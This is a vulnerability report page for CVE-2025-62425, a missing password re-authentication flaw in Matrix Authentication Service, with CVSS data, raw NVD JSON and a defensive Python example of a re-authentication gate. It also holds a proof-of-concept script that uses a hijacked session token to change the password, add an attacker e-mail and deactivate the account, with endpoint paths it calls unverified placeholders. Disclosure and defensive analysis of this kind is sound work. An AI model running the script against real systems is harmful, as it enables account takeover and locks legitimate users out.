Security Vulnerability Report
CVE-2025-62425 (CVSS 8.3 HIGH)

Published: 2025-10-16 19:15:35
Last Modified: 2026-04-15 00:35:42

Description

MAS (Matrix Authentication Service) is a user management and authentication service for Matrix homeservers, written and maintained by Element. A logic flaw in matrix-authentication-service 0.20.0 through 1.4.0 allows an attacker with access to an authenticated MAS session to perform sensitive operations without entering the current password. These include changing the current password, adding or removing an e-mail address and deactivating the account. The vulnerability only affects instances which have the local password database feature enabled (passwords section in the config). Patched in matrix-authentication-service 1.4.1.
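The bug class the description names, as an added illustration written for this page (it is not code from MAS, from the advisory or from the fix commit): a password-change handler that trusts the session alone, beside handlers that route every sensitive operation through one re-authentication gate that applies whenever the local password database is enabled. The `Account`, `Config` and `ReauthRequired` names, the PBKDF2-based storage and the operation functions are assumptions chosen for the example; MAS's real data model, password schemes and request handlers differ.

```python
"""Added example (not MAS code): sensitive account operations must re-verify
the current password when a local password database is in use.

Assumptions (not from the advisory): the Account/Config/ReauthRequired types,
PBKDF2 storage and the operation functions are illustrative only.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass, field


class ReauthRequired(Exception):
    """A sensitive operation was attempted without a valid current password."""


@dataclass
class Account:
    username: str
    salt: bytes
    password_hash: bytes
    emails: set = field(default_factory=set)
    active: bool = True


@dataclass
class Config:
    # Stands in for the "passwords" config section: the gate only applies when
    # the local password database is enabled, which is exactly the condition
    # under which the advisory says the flaw matters.
    passwords_enabled: bool = True


def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 keeps the example dependency-free; use a memory-hard KDF in production.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def create_account(username: str, password: str) -> Account:
    salt = os.urandom(16)
    return Account(username, salt, hash_password(password, salt))


def verify_password(account: Account, candidate: str) -> bool:
    # Constant-time comparison of the derived key.
    return hmac.compare_digest(hash_password(candidate, account.salt), account.password_hash)


# Vulnerable pattern: a valid session is all that is checked; the current
# password is never requested, so session access becomes account takeover.
def change_password_vulnerable(account: Account, new_password: str) -> None:
    account.salt = os.urandom(16)
    account.password_hash = hash_password(new_password, account.salt)


# Hardened pattern: one gate, called by every sensitive operation.
def require_current_password(config: Config, account: Account, current_password) -> None:
    if not config.passwords_enabled:
        # No local password exists for this account; any re-authentication
        # would have to use another factor (out of scope for this example).
        return
    if current_password is None or not verify_password(account, current_password):
        raise ReauthRequired("current password required for this operation")


def change_password(config: Config, account: Account, current_password, new_password: str) -> None:
    require_current_password(config, account, current_password)
    account.salt = os.urandom(16)
    account.password_hash = hash_password(new_password, account.salt)


def add_email(config: Config, account: Account, current_password, email: str) -> None:
    require_current_password(config, account, current_password)
    account.emails.add(email)


def deactivate(config: Config, account: Account, current_password) -> None:
    require_current_password(config, account, current_password)
    account.active = False


def demo():
    """Returns (takeover_succeeded_on_vulnerable, blocked_on_hardened, original_password_intact)."""
    cfg = Config(passwords_enabled=True)

    victim = create_account("alice", "correct horse")
    change_password_vulnerable(victim, "attacker-chosen")  # session only, no password
    took_over = verify_password(victim, "attacker-chosen")

    victim = create_account("alice", "correct horse")
    try:
        change_password(cfg, victim, None, "attacker-chosen")  # same request, gated
        blocked = False
    except ReauthRequired:
        blocked = True
    still_original = verify_password(victim, "correct horse")
    return took_over, blocked, still_original


if __name__ == "__main__":
    print(demo())
```

`demo()` runs the same attacker request against both patterns: the vulnerable handler accepts the new password with no proof of the old one, the gated handler raises `ReauthRequired` and leaves the original credential in place. The gate is deliberately a single function so that adding a new sensitive operation (another e-mail endpoint, a recovery-method change) cannot silently skip it.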

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No CPE configuration data has been published for this entry (NVD status: Deferred). Affected version range according to the vendor advisory:

matrix-authentication-service >= 0.20.0
matrix-authentication-service < 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62425 PoC - Matrix Authentication Service: sensitive account
# operations performed without password re-authentication.
#
# Exercises the three operations the advisory lists (change password, add an
# e-mail address, deactivate the account) from an already-authenticated MAS
# session, sending no current password at all. On an unpatched instance
# (0.20.0 through 1.4.0 with the local password database enabled) the
# operations go through; on 1.4.1 or later they must be rejected.
#
# Caveat: the endpoint paths and JSON field names below are the placeholders
# used in the original write-up. They are not verified against the account
# management API of any specific MAS release and must be adapted to the
# target version before this script is meaningful.
import requests

TARGET_URL = "https://mas.example.com"
SESSION_TOKEN = "<attacker_obtained_session_token>"

HEADERS = {
    "Authorization": f"Bearer {SESSION_TOKEN}",
    "Content-Type": "application/json",
}


def exploit_change_password(new_password):
    """Change the account password without supplying the current one.

    With a hijacked or borrowed session this locks the legitimate user out
    and turns session access into full account takeover.
    """
    url = f"{TARGET_URL}/account/password"
    # No "current_password" field: the flaw is that the server does not
    # require one before applying the change.
    payload = {"new_password": new_password}
    response = requests.post(url, json=payload, headers=HEADERS)
    print(f"[*] Password change response: {response.status_code}")
    return response.status_code == 200


def exploit_add_email(email):
    """Attach an attacker-controlled e-mail address without password verification.

    The added address can then be used to drive account-recovery flows.
    """
    url = f"{TARGET_URL}/account/emails"
    payload = {"email": email}
    response = requests.post(url, json=payload, headers=HEADERS)
    print(f"[*] Add email response: {response.status_code}")
    return response.status_code == 200


def exploit_deactivate_account():
    """Deactivate the victim's account without password verification.

    This is the availability impact in the CVSS vector (A:H): the legitimate
    user is locked out of the account.
    """
    url = f"{TARGET_URL}/account/deactivate"
    response = requests.post(url, headers=HEADERS)
    print(f"[*] Deactivate account response: {response.status_code}")
    return response.status_code == 200


if __name__ == "__main__":
    print("[*] CVE-2025-62425 - MAS re-authentication bypass PoC")
    print("[*] Affected: matrix-authentication-service 0.20.0 - 1.4.0")
    print("[*] Only affects instances with the local password database enabled\n")

    exploit_change_password("attacker_controlled_password")
    exploit_add_email("attacker@example.com")  # placeholder address
    exploit_deactivate_account()
```

References

https://github.com/element-hq/matrix-authentication-service/security/advisories/GHSA-6wfp-jq3r-j9xh (GitHub security advisory)
https://github.com/element-hq/matrix-authentication-service/commit/bce99edb6177be11f8f38c1d01f5606ce7b4b2e5 (referenced commit)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62425",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T19:15:35.120",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "MAS (Matrix Authentication Service) is a user management and authentication service for Matrix homeservers, written and maintained by Element. A logic flaw in matrix-authentication-service 0.20.0 through 1.4.0 allows an attacker with access to an authenticated MAS session to perform sensitive operations without entering the current password. These include changing the current password, adding or removing an e-mail address and deactivating the account. The vulnerability only affects instances which have the local password database feature enabled (passwords section in the config). Patched in matrix-authentication-service 1.4.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-620"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/element-hq/matrix-authentication-service/commit/bce99edb6177be11f8f38c1d01f5606ce7b4b2e5",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/element-hq/matrix-authentication-service/security/advisories/GHSA-6wfp-jq3r-j9xh",
        "source": "[email protected]"
      }
    ]
  }
}